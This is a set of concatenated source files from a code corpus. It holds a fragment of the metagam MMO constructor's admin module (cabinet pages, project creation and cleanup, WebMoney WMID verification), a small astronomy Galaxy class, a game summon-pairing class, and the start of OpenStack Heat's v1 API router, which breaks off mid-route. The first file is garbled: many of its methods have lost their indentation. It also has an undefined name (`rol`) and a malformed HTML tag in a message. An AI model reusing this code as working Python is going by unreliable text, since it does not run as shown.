        """Return the display title of the main constructor project."""
        return "MMO Constructor"
    def appfactory(self):
        """Hook: supply the constructor application factory.

        Hooks.Return delivers the value to the hook caller and stops
        processing of any remaining handlers.
        """
        raise Hooks.Return(mg.constructor.common.ApplicationFactory(self.app().inst))
    def webservice(self):
        """Hook: supply the constructor web service (delivered via Hooks.Return)."""
        raise Hooks.Return(mg.constructor.common.ConstructorWebService(self.app().inst))
    def objclasses_list(self, objclasses):
        """Expose the Project object class to database tooling."""
        objclasses["Project"] = (Project, ProjectList)
def projects_list(self, projects):
projects.append({"uuid": "main"})
list = self.app().inst.int_app.objlist(ProjectList, query_index="created")
list.load(silent=True)
projects.extend(list.data())
def projects_owned_by(self, owner, projects):
list = self.app().inst.int_app.objlist(ProjectList, query_index="owner", query_equal=owner)
list.load(silent=True)
projects.extend(list.data())
    def schedule(self, sched):
        """Register periodic cluster tasks (cron-style specifications)."""
        # Purge long-inactive projects nightly at 01:10.
        sched.add("projects.cleanup_inactive", "10 1 * * *", priority=10)
        # Run the daily per-application check at midnight.
        sched.add("projects.appcheck", "0 0 * * *", priority=10)
def cleanup_inactive(self):
inst = self.app().inst
projects = inst.int_app.objlist(ProjectList, query_index="inactive", query_equal="1", query_finish=self.now(-30 * 86400))
for project in projects:
self.info("Removing inactive project %s", project.uuid)
self.call("project.cleanup", project.uuid)
def appcheck(self):
self.info("Starting daily check")
apps = []
self.call("applications.list", apps)
for app in apps:
self.call("queue.add", "app.check", priority=0, app_tag=app["tag"], unique="app-check-%s" % app["cls"], app_cls=app["cls"])
def web_setup_design(self, vars):
req = self.req()
topmenu = []
cabmenu = []
if req.group == "index" and req.hook == "index":
vars["disclaimer"] = self._("Intended audience: Mature (16+)")
vars["global_html"] = "constructor/index_global.html"
elif req.group == "constructor" and req.hook == "newgame" or req.group == "webmoney":
vars["global_html"] = "constructor/cabinet_global.html"
cabmenu.append({"title": self._("Return to the Cabinet"), "href": "/cabinet", "image": "/st/constructor/cabinet/constructor.gif"})
elif req.group == "socio" and req.hook == "image":
pass
elif req.group == "auth" or req.group == "email":
if req.hook == "change" or req.hook == "email":
vars["global_html"] = "constructor/cabinet_global.html"
vars["ToTheMainPage"] = self._("To the main page")
if req.hook == "change":
cabmenu.append({"title": self._("Password changing"), "left": True})
elif req.hook == "email":
cabmenu.append({"title": self._("E-mail changing"), "left": True})
cabmenu.append({"image": "/st/constructor/cabinet/settings.gif", "title": self._("Return to the Settings"), "href": "/cabinet/settings"})
else:
vars["global_html"] = "constructor/index_global.html"
elif req.group == "reqauction":
vars["title_suffix"] = " - %s" % self._("MMO Constructor Requests auction")
vars["global_html"] = "constructor/socio_global.html"
topmenu.append({"href": "/doc", "html": self._("Documentation")})
topmenu.append({"href": "/forum", "html": self._("Forum")})
if req.user():
topmenu.append({"href": "/cabinet", "html": self._("Cabinet")})
topmenu.append({"html": self._("MMO Constructor Requests auction"), "header": True, "left": True})
elif req.group == "cabinet":
vars["global_html"] = "constructor/cabinet_global.html"
vars["ToTheMainPage"] = self._("To the main page")
if req.hook == "settings":
cabmenu.append({"title": self._("Settings"), "left": True})
cabmenu.append({"title": self._("Return to the Cabinet"), "href": "/cabinet", "image": "/st/constructor/cabinet/constructor.gif"})
elif req.hook == "index":
user = self.obj(User, req.user())
cabmenu.append({"title": self._("Documentation"), "href": "/doc", "left": True})
cabmenu.append({"title": self._("Settings"), "href": "/cabinet/settings", "left": True})
cabmenu.append({"title": self._("Requests auction"), "href": "/reqauction", "left": True})
cabmenu.append({"title": self._("Forum"), "href": "/forum", "left": True})
links = []
self.call("telegrams.menu", links)
for link in links:
cabmenu.append({"image": "/st/constructor/cabinet/telegrams%s.gif" % ("-act" if link["suffix"] else ""), "title": link["html"], "href": link["href"], "left": True, "suffix": link["suffix"]})
cabmenu.append({"image": "/st/constructor/cabinet/logout.gif", "title": self._("Logout %s") % htmlescape(user.get("name")), "href": "/auth/logout"})
elif req.group == "forum" or req.group == "socio":
vars["title_suffix"] = " - %s" % self._("MMO Constructor Forum")
redirect = req.param("redirect")
redirect_param = True
if redirect is None or redirect == "":
redirect = req.uri()
redirect_param = False
redirect = urlencode(redirect)
if req.hook == "settings":
pass
else:
if req.group == "forum":
topmenu.append({"search": True, "button": self._("socio-top///Search")})
if req.user():
topmenu.append({"href": "/forum/settings?redirect=%s" % redirect, "html": self._("Settings")})
links = []
self.call("telegrams.menu", links)
for link in links:
topmenu.append({"image": "/st/constructor/cabinet/telegrams%s.gif" % ("-act" if link["suffix"] else ""), "html": link["html"], "href": link["href"], "suffix": link["suffix"]})
topmenu.append({"href": "/doc", "html": self._("Documentation")})
if req.user():
topmenu.append({"href": "/socio/paid-services", "html": u'<img src="/st-mg/img/coins-16x16.png" alt="{premium}" title="{premium}" />'.format(premium=self._("Premium"))})
if req.group != "forum":
topmenu.append({"href": "/forum", "html": self._("Forum")})
if req.user():
topmenu.append({"href": "/reqauction", "html": self._("Auction")})
topmenu.append({"href": "/cabinet", "html": self._("Cabinet")})
else:
topmenu.append({"href": "/auth/login?redirect=%s" % redirect, "html": self._("Log in")})
topmenu.append({"href": "/auth/register?redirect=%s" % redirect, "html": self._("Register")})
if redirect_param:
topmenu.append({"href": htmlescape(req.param("redirect")), "html": self._("Cancel")})
elif req.group == "telegrams":
vars["title_suffix"] = " - %s" % self._("MMO Constructor")
topmenu.append({"href": "/doc", "html": self._("Documentation")})
topmenu.append({"href": "/forum", "html": self._("Forum")})
links = []
self.call("telegrams.menu", links)
for link in links:
topmenu.append({"image": "/st/constructor/cabinet/telegrams%s.gif" % ("-act" if link["suffix"] else ""), "html": link["html"], "href": link["href"], "suffix": link["suffix"]})
topmenu.append({"href": "/cabinet", "html": self._("Cabinet")})
elif req.group == "doc":
#vars["global_html"] = "constructor/socio_global.html"
if req.user():
topmenu.append({"href": "/reqauction", "html": self._("Request auction")})
topmenu.append({"href": "/forum", "html": self._("Forum")})
if req.user():
topmenu.append({"href": "/cabinet", "html": self._("Cabinet")})
topmenu.append({"html": self._("MMO Constructor Documentation"), "header": True, "left": True})
elif req.group == "admin":
vars["global_html"] = "constructor/admin_global.html"
# Topmenu
if len(topmenu):
topmenu_left = []
topmenu_right = []
for ent in topmenu:
if ent.get("left"):
topmenu_left.append(ent)
else:
topmenu_right.append(ent)
if len(topmenu_left):
topmenu_left[-1]["lst"] = True
vars["topmenu_left"] = topmenu_left
if len(topmenu_right):
topmenu_right[-1]["lst"] = True
vars["topmenu_right"] = topmenu_right
# Cabmenu
if len(cabmenu):
cabmenu_left = []
cabmenu_right = []
first_left = True
first_right = True
for ent in cabmenu:
if ent.get("left"):
cabmenu_left.append(ent)
else:
cabmenu_right.append(ent)
if len(cabmenu_left):
cabmenu_left[-1]["lst"] = True
vars["cabmenu_left"] = cabmenu_left
if len(cabmenu_right):
cabmenu_right[-1]["lst"] = True
vars["cabmenu_right"] = cabmenu_right
    def universal_variables(self, vars):
        """Inject constructor-wide template variables into every page."""
        vars["ConstructorTitle"] = self._("Browser-based Games Constructor")
        # Copyright range always ends with the current UTC year.
        vars["ConstructorCopyright"] = self._("Copyright © Joy Team, 2009-%s") % datetime.datetime.utcnow().strftime("%Y")
        vars["ConstructorSupport"] = '<a href="mailto:support@{0}">support@{0}</a>'.format(self.main_host)
    def redirects(self, tbl):
        """Fill post-authentication redirect targets (login/register/change)."""
        tbl["login"] = "/cabinet"
        tbl["register"] = "/cabinet"
        tbl["change"] = "/cabinet/settings"
    def index(self):
        """Render the public constructor index page."""
        req = self.req()
        vars = {
            "title": self._("Constructor of browser-based online games"),
            "login": self._("log in"),
            "register": self._("register"),
            "forum": self._("forum"),
            "cabinet": self._("cabinet"),
            "logout": self._("log out"),
            "documentation": self._("documentation"),
        }
        if req.user():
            vars["logged"] = True
        # Social-network widgets (simplified variant for the index page).
        self.call("socialnets.render", vars, simple=True)
        self.call("web.response_template", "constructor/index.html", vars)
    def cabinet_index(self):
        """Render the user's cabinet: admin link, WMID prompt and game grid."""
        req = self.req()
        menu = []
        menu_projects = []
        vars = {
            "title": self._("Cabinet"),
        }
        # constructor admin
        perms = req.permissions()
        if len(perms):
            # Any admin permission at all exposes the administration shortcut.
            menu_projects.append({"href": "/admin", "image": "/st/constructor/cabinet/untitled.gif", "text": self._("Constructor administration")})
        columns = 4
        if not self.call("wmid.check", req.user()):
            # No verified WMID yet: show the verification button plus an
            # explanation, and narrow the grid to make room for it.
            vars["cabinet_wmbtn"] = {
                "href": self.call("wmlogin.url"),
                "title": self._("Verify your WMID")
            }
            lang = self.call("l10n.lang")
            if lang == "ru":
                url = "https://start.webmoney.ru/"
            else:
                url = "https://start.wmtransfer.com/"
            vars["cabinet_comment"] = self._('<p>To get an ability to write to the forum and to use the Request auction follow the steps given below:</p><ul><li><a href="{url}" target="_blank">Register in the WebMoney system</a> please</li><li>Press "Verify your WMID" button</li></ul><p><a href="/doc/wmcertificates"><strong>For what reason we require it</strong></a></p>').format(url=url)
            columns = 3
        # list of games
        projects = self.app().inst.int_app.objlist(ProjectList, query_index="owner", query_equal=req.user())
        projects.load(silent=True)
        if len(projects):
            for project in projects:
                if project.get("suspended"):
                    continue
                title = project.get("title_short")
                if title is None:
                    title = self._("Untitled game")
                href = None
                # Inactive projects are reached via their own subdomain admin;
                # active ones via the constructor game page.
                if project.get("inactive"):
                    domain = "%s.%s" % (project.uuid, self.conf("constructor.projects-domain", self.main_host))
                    href = "http://%s/admin" % domain
                else:
                    href = "/constructor/game/%s" % project.uuid
                logo = project.get("logo")
                if logo is None:
                    logo = "/st/constructor/cabinet/untitled.gif"
                menu_projects.append({"href": href, "image": logo, "text": title})
                # Wrap to a new menu row when the current one is full.
                if len(menu_projects) >= columns:
                    menu.append(menu_projects)
                    menu_projects = []
        if len(menu_projects):
            menu.append(menu_projects)
        if menu:
            vars["cabinet_menu"] = menu
        vars["cabinet_leftbtn"] = {
            "href": "/constructor/newgame",
            "title": self._("Create a new game")
        }
        self.call("web.response_global", None, vars)
    def cabinet_settings(self):
        """Render the cabinet settings page with links and WMID status."""
        req = self.req()
        vars = {
            "title": self._("MMO Constructor Settings"),
            "cabinet_menu": [
                [
                    { "href": "/auth/change", "image": "/st/constructor/cabinet/untitled.gif", "text": self._("Change password") },
                    { "href": "/auth/email", "image": "/st/constructor/cabinet/untitled.gif", "text": self._("Change e-mail") },
                    { "href": "/forum/settings?redirect=/cabinet/settings", "image": "/st/constructor/cabinet/untitled.gif", "text": self._("Forum settings") },
                ],
            ],
        }
        # Show verified WMIDs (with certificate names) if the user has any.
        wmids = self.wmid_check(req.user())
        if wmids:
            vars["cabinet_center"] = self._('Your verified WMID: {wmid}. <a href="{url}">Check again</a>').format(wmid=', '.join([self._('<strong>{wmid}</strong> (certificate: <strong>{certificate}</strong>)').format(wmid=wmid, certificate=self.cert_name(cert)) for wmid, cert in wmids.iteritems()]), url=self.call("wmlogin.url"))
        self.call("web.response_global", None, vars)
def cert_name(self, cert):
if cert >= 130:
return self._("wmcert///personal")
elif cert >= 120:
return self._("wmcert///initial")
elif cert >= 110:
return self._("wmcert///formal")
else:
return self._("wmcert///pseudonymous")
    def constructor_newgame(self):
        """Create a new game project for the current user and redirect to its admin UI.

        Checks (disabled WMID verification, invitation policy) may render an
        informational page instead; web.response_* presumably terminates the
        request — TODO confirm, otherwise a project would be created anyway.
        """
        req = self.req()
        # NOTE(review): "and False" deliberately disables the WMID verification
        # requirement; the block is kept for possible reactivation.
        if not self.call("wmid.check", req.user()) and False:
            vars = {
                "title": self._("Verified WMID required"),
                "text": self._("You haven't passed WMID verification yet"),
            }
            self.call("web.response_template", "constructor/setup/info.html", vars)
        # Registration on invitations
        # invitations: 2 = registration closed, truthy = invitation code required
        invitations = self.conf("constructor.invitations")
        if invitations == 2:
            vars = {
                "title": self._("Registration closed"),
                "text": self.conf("constructor.invitations-text", self._("Open registration of new games is unavailable at the moment")),
            }
            self.call("web.response_template", "constructor/setup/info.html", vars)
        elif invitations:
            # Ask for an invitation code unless the user already entered one.
            if not self.call("invitation.ok", req.user(), "newproject"):
                invitation = req.param("invitation")
                form = self.call("web.form")
                if req.param("ok"):
                    if not invitation or invitation == "":
                        form.error("invitation", self._("Enter invitation code"))
                    else:
                        err = self.call("invitation.enter", req.user(), "newproject", invitation)
                        if err:
                            form.error("invitation", err)
                    if not form.errors:
                        # Valid code: retry the whole handler with access granted.
                        self.call("web.redirect", "/constructor/newgame")
                form.input(self._("Invitation code"), "invitation", invitation)
                form.submit(None, None, self._("Proceed"))
                form.add_message_top(self.conf("constructor.invitations-text", self._("Open registration of new games is unavailable at the moment")))
                vars = {
                    "title": self._("Invitation required"),
                }
                self.call("web.response_global", form.html(), vars)
        inst = self.app().inst
        # creating new project and application
        int_app = inst.int_app
        project = int_app.obj(Project)
        project.set("created", self.now())
        project.set("owner", req.user())
        project.set("inactive", 1)
        project.set("storage", 2)
        project.set("keyspace", "eden")
        project.store()
        # accessing new application
        app = inst.appfactory.get_by_tag(project.uuid)
        # setting up everything
        app.hooks.call("app.check")
        # creating setup wizard
        app.hooks.call("wizards.new", "mg.constructor.setup.ProjectSetupWizard")
        self.call("web.redirect", "http://%s/admin" % app.domain)
def constructor_game(self):
req = self.req()
try:
project = self.int_app().obj(Project, req.args)
except ObjectNotFoundException:
self.call("web.not_found")
if project.get("owner") != req.user():
self.call("web.forbidden")
app = self.app().inst.appfactory.get_by_tag(project.uuid)
domain = project.get("domain")
if domain is None:
domain = "%s.%s" % (project.uuid, self.conf("constructor.projects-domain", self.main_host))
else:
domain = "www.%s" % domain
admins = app.objlist(DBCharacterList, query_index="admin", query_equal="1")
if not len(admins):
self.call("web.redirect", "http://%s" % domain)
admin = admins[0]
# restoring admin rights
perms = app.hooks.call("auth.permissions", admin.uuid)
if not perms.get("project.admin"):
self.info("Restoring admin permissions for user %s", admin.uuid)
app.hooks.call("auth.grant-permission", admin.uuid, "project.admin")
# logging in
autologin = app.hooks.call("auth.autologin", admin.uuid)
self.call("web.redirect", "http://%s/auth/autologin/%s" % (domain, autologin))
def cleanup(self, tag):
inst = self.app().inst
int_app = inst.int_app
app = inst.appfactory.get_by_tag(tag)
int_app.sql_write.do("delete from queue_tasks where app=?", tag)
sched = int_app.obj(Schedule, tag, silent=True)
sched.remove()
project = int_app.obj(Project, tag, silent=True)
project.remove()
if app is not None:
sessions = app.objlist(SessionList, query_index="valid_till")
sessions.remove()
users = app.objlist(UserList, query_index="created")
users.remove()
perms = app.objlist(UserPermissionsList, users.uuids())
perms.remove()
config = app.objlist(DBConfigGroupList, query_index="all")
config.remove()
hook_modules = app.objlist(DBHookGroupModulesList, query_index="all")
hook_modules.remove()
wizards = app.objlist(WizardConfigList, query_index="all")
wizards.remove()
temp_files = int_app.objlist(DBTempFileList, query_index="app", query_equal=tag)
temp_files.load(silent=True)
for file in temp_files:
file.delete()
temp_files.remove()
def password_changed(self, user, password):
self.info("Changed password of user %s", user.uuid)
projects = self.app().inst.int_app.objlist(ProjectList, query_index="owner", query_equal=user.uuid)
projects.load(silent=True)
for project in projects:
app = self.app().inst.appfactory.get_by_tag(project.uuid)
users = app.objlist(UserList, query_index="name", query_equal=user.get("name"))
users.load(silent=True)
for u in users:
self.info("Replicated password to the user %s in the project %s", u.uuid, project.uuid)
u.set("salt", user.get("salt"))
u.set("pass_reminder", user.get("pass_reminder"))
u.set("pass_hash", user.get("pass_hash"))
u.store()
def indexpage_render(self, vars):
fields = [
{"code": "name", "prompt": self._("Enter your name, please"), "type": 0},
{"code": "sex", "prompt": self._("What\\'s your sex"), "type": 1, "values": [[0, "Male"], [1, "Female", True]]},
{"code": "motto", "prompt": self._("This is a very long text asking you to enter your motto. So be so kind entering your motto"), "type": 2},
{"code": "password", "prompt": self._("Enter your password")},
]
vars["register_fields"] = fields
def telegrams_params(self, params):
params["menu_title"] = self._("telegrams menu///Post")
params["page_title"] = self._("Messages")
params["last_telegram"] = self._("Last message")
params["all_telegrams"] = self._("All messages")
params["send_telegram"] = self._("Send a new message")
params["text"] = self._("Message text")
params["system_name"] = self._("MMO Constructor")
params["telegrams_with"] = self._("Correspondence with {0}")
params["ignore_list"] = self._("Ignore list")
def email_sender(self, params):
params["email"] = "robot@%s" % self.main_app().main_host
params["name"] = self._("MMO Constructor")
params["prefix"] = "[mmo] "
params["signature"] = self._("MMO Constructor - {protocol}://www.{host} - constructor of browser-based online games").format(protocol=self.main_app().protocol, host=self.main_host)
def wmlogin_authorized(self, authtype, remote_addr, wmid):
req = self.req()
with self.lock(["WMLogin.%s" % req.user(), "WMLogin.%s" % wmid]):
self.debug("User %s uses WMID %s", req.user(), wmid)
wmids = self.wmid_check(req.user())
self.debug("Authorized WMIDS are: %s", wmids)
if wmids and wmid not in wmids:
vars = {
"title": self._("WMID verified already"),
"text": self._("You have verified another WMID already: %s") % (', '.join(wmids)),
}
self.call("web.response_template", "constructor/setup/info.html", vars)
else:
cert = self.call("wmcert.get", wmid)
self.debug("Certificate of %s is %s", wmid, cert)
if cert < 110:
vars = {
"title": self._("WMID not verified"),
"text": self._('We have ensured your WMID is <strong>{wmid}</strong>. But to our regret you has not even formal certificate. Please <a href="https://passport.wmtransfer.com/asp/aProcess.asp">get the formal certificate</a> (data are not verified by notaries or the center\'s legal department) and retry WMID verification').format(wmid=wmid, cert=self.cert_name(cert)),
}
self.call("web.response_template", "constructor/setup/info.html", vars)
if not wmids or wmid not in wmids:
lst = self.objlist(DBUserWMIDList, query_index="wmid", query_equal=wmid)
lst.load()
if len(lst):
user = self.obj(User, lst[0].get("user"))
vars = {
"title": self._("WMID is assigned to another user"),
"text": self._("This WMID is assigned already to the user <strong>%s</strong>. You can't assign one WMID to several accounts") % htmlescape(user.get("name")),
}
self.call("web.response_template", "constructor/setup/info.html", vars)
obj = self.obj(DBUserWMID)
obj.set("added", self.now())
obj.set("user", req.user())
obj.set("wmid", wmid)
obj.set("cert", cert)
obj.set("authtype", authtype)
obj.set("ip", remote_addr)
obj.store()
elif cert > wmids[wmid]:
lst = self.objlist(DBUserWMIDList, query_index="wmid", query_equal=wmid)
lst.load()
for ent in lst:
ent.set("cert", cert)
ent.store()
vars = {
"title": self._("WMID verified"),
"text": self._("We have verified your WMID <strong>{wmid}</strong> successfully. Certificate level: <strong>{cert}>/strong>").format(wmid=wmid, cert=self.cert_name(cert)),
}
self.call("web.response_template", "constructor/setup/info.html", vars)
def wmid_check(self, user_uuid):
lst = self.objlist(DBUserWMIDList, query_index="user", query_equal=user_uuid)
if not len(lst):
return None
lst.load()
return dict([(ent.get("wmid"), ent.get("cert")) for ent in lst])
    def auth_user_table(self, user, tbl):
        # Append an "Authorized WMID" row to the admin user dashboard table.
        # Each WMID is rendered with its certificate name and a remove link
        # handled by wmauth_remove(); shown only to admins with "auth.wmid".
        req = self.req()
        if req.has_access("auth.wmid"):
            wmids = self.wmid_check(user.uuid)
            tbl["rows"].append([self._("Authorized WMID"), ', '.join([u'<strong>{wmid}</strong> ({cert}) — <hook:admin.link href="wmauth/remove/{user}/{wmid}" title="{remove}" confirm="{confirm}" />'.format(cert=self._("wm///certificate: %s") % self.cert_name(cert), wmid=wmid, user=user.uuid, remove=self._("remove"), confirm=self._("Are you sure want to delete this WMID?")) for wmid, cert in wmids.iteritems()]) if wmids else self._("none")])
def wmauth_remove(self):
req = self.req()
m = re_wmauth_remove.match(req.args)
if not m:
self.call("web.not_found")
user_uuid, wmid = m.group(1, 2)
lst = self.objlist(DBUserWMIDList, query_index="user", query_equal=user_uuid)
lst.load()
for ent in lst:
if ent.get("wmid") == wmid:
ent.remove()
self.call("admin.redirect", "auth/user-dashboard/%s" % user_uuid, {"active_tab": "auth"})
def list_roles(self, roles):
roles.append(("wmid", self._("Authorized WMID")))
roles.append(("nowmid", self._("Not authorized WMID")))
def users_roles(self, users, roles):
authorized = set()
lst = self.objlist(DBUserWMIDList, query_index="user", query_equal=users)
lst.load()
for ent in lst:
authorized.add(ent.get("user"))
for user in users:
role = "wmid" if user in authorized else "nowmid"
try:
roles[user].append(role)
except KeyError:
roles[user] = [rol]
|
JoyTeam/metagam
|
mg/constructor/admin.py
|
Python
|
gpl-3.0
| 42,144
|
"""
#;+
#; NAME:
#; galaxy.core
#; Version 1.0
#;
#; PURPOSE:
#; Core routines for galaxy analysis
#; 29-Nov-2014 by JXP
#;-
#;------------------------------------------------------------------------------
"""
from __future__ import print_function, absolute_import, division, unicode_literals
import os, copy, sys
import numpy as np
from astropy import units as u
from astropy.io import ascii
from astropy.coordinates import SkyCoord
from xastropy.xutils import xdebug as xdb
# Class for LLS Absorption Lines
class Galaxy(object):
    """A galaxy with a sky position and an adopted redshift.

    Attributes:
      name: string
          Auto-generated J-style identifier built from the coordinates
      z: float
          Adopted redshift
      coord: SkyCoord
          ICRS coordinates of the galaxy
    """

    def __init__(self, ra=None, dec=None, z=0.):
        self.z = z
        # Fall back to the origin when either coordinate is missing.
        ras = '00 00 00' if ra is None else str(ra)
        decs = '+00 00 00' if dec is None else str(dec)
        self.coord = SkyCoord(ras, decs, 'icrs', unit=(u.hour, u.deg))
        # Build a J2000-style name (Jhhmmss...+ddmmss...) from the position.
        self.name = ('J'+
            self.coord.ra.to_string(unit=u.hour,sep='',pad=True)+
            self.coord.dec.to_string(sep='',pad=True,alwayssign=True))

    def __repr__(self):
        """Short human-readable summary with name, position and redshift."""
        return ('[Galaxy: {:s} {:s} {:s}, z={:g}]'.format(
                self.name,
                self.coord.ra.to_string(unit=u.hour,sep=':',pad=True),
                self.coord.dec.to_string(sep=':',pad=True),
                self.z) )
## #################################
## #################################
## TESTING
## #################################
if __name__ == '__main__':
    # Smoke test: build a default galaxy at the origin and print its repr.
    # Instantiate
    gal = Galaxy()
    print(gal)
|
astronomeara/xastropy-old
|
xastropy/galaxy/core.py
|
Python
|
bsd-3-clause
| 1,859
|
class SummonList:
    """Holds the player's own summons and the friend-list helper summons."""

    def __init__(self, my_summons, helper_summons):
        self.my_summons = my_summons
        self.helper_summons = helper_summons

    # Pair your summon with each friend list summon
    # @return List of summon pairs
    @property
    def summon_pairs(self):
        # Cartesian product: every own summon paired with every helper summon,
        # own summons varying slowest (same order as the original nested loops).
        return [(own, friend)
                for own in self.my_summons
                for friend in self.helper_summons]
|
adangtran87/gbf-weap
|
summon_list.py
|
Python
|
mit
| 484
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import routes
import six
from heat.api.openstack.v1 import actions
from heat.api.openstack.v1 import build_info
from heat.api.openstack.v1 import events
from heat.api.openstack.v1 import resources
from heat.api.openstack.v1 import services
from heat.api.openstack.v1 import software_configs
from heat.api.openstack.v1 import software_deployments
from heat.api.openstack.v1 import stacks
from heat.common import wsgi
class API(wsgi.Router):
    """WSGI router for Heat v1 REST API requests."""
    def __init__(self, conf, **local_conf):
        """Build the route mapper for all Heat v1 REST resources.

        conf -- configuration object handed to each resource factory
        local_conf -- extra deployment options (not used here)
        """
        self.conf = conf
        mapper = routes.Mapper()
        # Fallback controller used to answer 405 (method not allowed) and
        # OPTIONS requests for URLs whose method is not otherwise handled.
        default_resource = wsgi.Resource(wsgi.DefaultMethodController(),
                                         wsgi.JSONRequestDeserializer())
        def connect(controller, path_prefix, routes):
            """Connects list of routes to given controller with path_prefix.
            This function connects the list of routes to the given
            controller, prepending the given path_prefix. Then for each URL it
            finds which request methods aren't handled and configures those
            to return a 405 error. Finally, it adds a handler for the
            OPTIONS method to all URLs that returns the list of allowed
            methods with 204 status code.
            """
            # register the routes with the mapper, while keeping track of which
            # methods are defined for each URL
            urls = {}
            for r in routes:
                url = path_prefix + r['url']
                methods = r['method']
                if isinstance(methods, six.string_types):
                    methods = [methods]
                methods_str = ','.join(methods)
                mapper.connect(r['name'], url, controller=controller,
                               action=r['action'],
                               conditions={'method': methods_str})
                if url not in urls:
                    urls[url] = methods
                else:
                    urls[url] += methods
            # now register the missing methods to return 405s, and register
            # a handler for OPTIONS that returns the list of allowed methods
            for url, methods in urls.items():
                all_methods = ['HEAD', 'GET', 'POST', 'PUT', 'PATCH', 'DELETE']
                missing_methods = [m for m in all_methods if m not in methods]
                allowed_methods_str = ','.join(methods)
                mapper.connect(url,
                               controller=default_resource,
                               action='reject',
                               allowed_methods=allowed_methods_str,
                               conditions={'method': missing_methods})
                if 'OPTIONS' not in methods:
                    mapper.connect(url,
                                   controller=default_resource,
                                   action='options',
                                   allowed_methods=allowed_methods_str,
                                   conditions={'method': 'OPTIONS'})
        # Stacks
        stacks_resource = stacks.create_resource(conf)
        connect(controller=stacks_resource,
                path_prefix='/{tenant_id}',
                routes=[
                    # Template handling
                    {
                        'name': 'template_validate',
                        'url': '/validate',
                        'action': 'validate_template',
                        'method': 'POST'
                    },
                    {
                        'name': 'resource_types',
                        'url': '/resource_types',
                        'action': 'list_resource_types',
                        'method': 'GET'
                    },
                    {
                        'name': 'resource_schema',
                        'url': '/resource_types/{type_name}',
                        'action': 'resource_schema',
                        'method': 'GET'
                    },
                    {
                        'name': 'generate_template',
                        'url': '/resource_types/{type_name}/template',
                        'action': 'generate_template',
                        'method': 'GET'
                    },
                    {
                        'name': 'template_versions',
                        'url': '/template_versions',
                        'action': 'list_template_versions',
                        'method': 'GET'
                    },
                    {
                        'name': 'template_functions',
                        'url': '/template_versions/{template_version}'
                               '/functions',
                        'action': 'list_template_functions',
                        'method': 'GET'
                    },
                    # Stack collection
                    {
                        'name': 'stack_index',
                        'url': '/stacks',
                        'action': 'index',
                        'method': 'GET'
                    },
                    {
                        'name': 'stack_create',
                        'url': '/stacks',
                        'action': 'create',
                        'method': 'POST'
                    },
                    {
                        'name': 'stack_preview',
                        'url': '/stacks/preview',
                        'action': 'preview',
                        'method': 'POST'
                    },
                    {
                        'name': 'stack_detail',
                        'url': '/stacks/detail',
                        'action': 'detail',
                        'method': 'GET'
                    },
                    # Stack data
                    {
                        'name': 'stack_lookup',
                        'url': '/stacks/{stack_name}',
                        'action': 'lookup',
                        'method': ['GET', 'POST', 'PUT', 'PATCH', 'DELETE']
                    },
                    # \x3A matches on a colon.
                    # Routes treats : specially in its regexp
                    {
                        'name': 'stack_lookup',
                        'url': r'/stacks/{stack_name:arn\x3A.*}',
                        'action': 'lookup',
                        'method': ['GET', 'POST', 'PUT', 'PATCH', 'DELETE']
                    },
                    {
                        'name': 'stack_lookup_subpath',
                        'url': '/stacks/{stack_name}/'
                               '{path:resources|events|template|actions}',
                        'action': 'lookup',
                        'method': 'GET'
                    },
                    {
                        'name': 'stack_lookup_subpath_post',
                        'url': '/stacks/{stack_name}/'
                               '{path:resources|events|template|actions}',
                        'action': 'lookup',
                        'method': 'POST'
                    },
                    {
                        'name': 'stack_show',
                        'url': '/stacks/{stack_name}/{stack_id}',
                        'action': 'show',
                        'method': 'GET'
                    },
                    # NOTE(review): this route reuses the name 'stack_lookup'
                    # although it serves the stack template (upstream heat names
                    # it 'stack_template'); duplicate names make
                    # url_for('stack_lookup') ambiguous — confirm before renaming.
                    {
                        'name': 'stack_lookup',
                        'url': '/stacks/{stack_name}/{stack_id}/template',
                        'action': 'template',
                        'method': 'GET'
                    },
                    # Stack update/delete
                    {
                        'name': 'stack_update',
                        'url': '/stacks/{stack_name}/{stack_id}',
                        'action': 'update',
                        'method': 'PUT'
                    },
                    {
                        'name': 'stack_update_patch',
                        'url': '/stacks/{stack_name}/{stack_id}',
                        'action': 'update_patch',
                        'method': 'PATCH'
                    },
                    {
                        'name': 'preview_stack_update',
                        'url': '/stacks/{stack_name}/{stack_id}/preview',
                        'action': 'preview_update',
                        'method': 'PUT'
                    },
                    {
                        'name': 'preview_stack_update_patch',
                        'url': '/stacks/{stack_name}/{stack_id}/preview',
                        'action': 'preview_update_patch',
                        'method': 'PATCH'
                    },
                    {
                        'name': 'stack_delete',
                        'url': '/stacks/{stack_name}/{stack_id}',
                        'action': 'delete',
                        'method': 'DELETE'
                    },
                    # Stack abandon
                    {
                        'name': 'stack_abandon',
                        'url': '/stacks/{stack_name}/{stack_id}/abandon',
                        'action': 'abandon',
                        'method': 'DELETE'
                    },
                    {
                        'name': 'stack_export',
                        'url': '/stacks/{stack_name}/{stack_id}/export',
                        'action': 'export',
                        'method': 'GET'
                    },
                    {
                        'name': 'stack_snapshot',
                        'url': '/stacks/{stack_name}/{stack_id}/snapshots',
                        'action': 'snapshot',
                        'method': 'POST'
                    },
                    {
                        'name': 'stack_snapshot_show',
                        'url': '/stacks/{stack_name}/{stack_id}/snapshots/'
                               '{snapshot_id}',
                        'action': 'show_snapshot',
                        'method': 'GET'
                    },
                    {
                        'name': 'stack_snapshot_delete',
                        'url': '/stacks/{stack_name}/{stack_id}/snapshots/'
                               '{snapshot_id}',
                        'action': 'delete_snapshot',
                        'method': 'DELETE'
                    },
                    {
                        'name': 'stack_list_snapshots',
                        'url': '/stacks/{stack_name}/{stack_id}/snapshots',
                        'action': 'list_snapshots',
                        'method': 'GET'
                    },
                    {
                        'name': 'stack_snapshot_restore',
                        'url': '/stacks/{stack_name}/{stack_id}/snapshots/'
                               '{snapshot_id}/restore',
                        'action': 'restore_snapshot',
                        'method': 'POST'
                    },
                    # Stack outputs
                    {
                        'name': 'stack_output_list',
                        'url': '/stacks/{stack_name}/{stack_id}/outputs',
                        'action': 'list_outputs',
                        'method': 'GET'
                    },
                    {
                        'name': 'stack_output_show',
                        'url': '/stacks/{stack_name}/{stack_id}/outputs/'
                               '{output_key}',
                        'action': 'show_output',
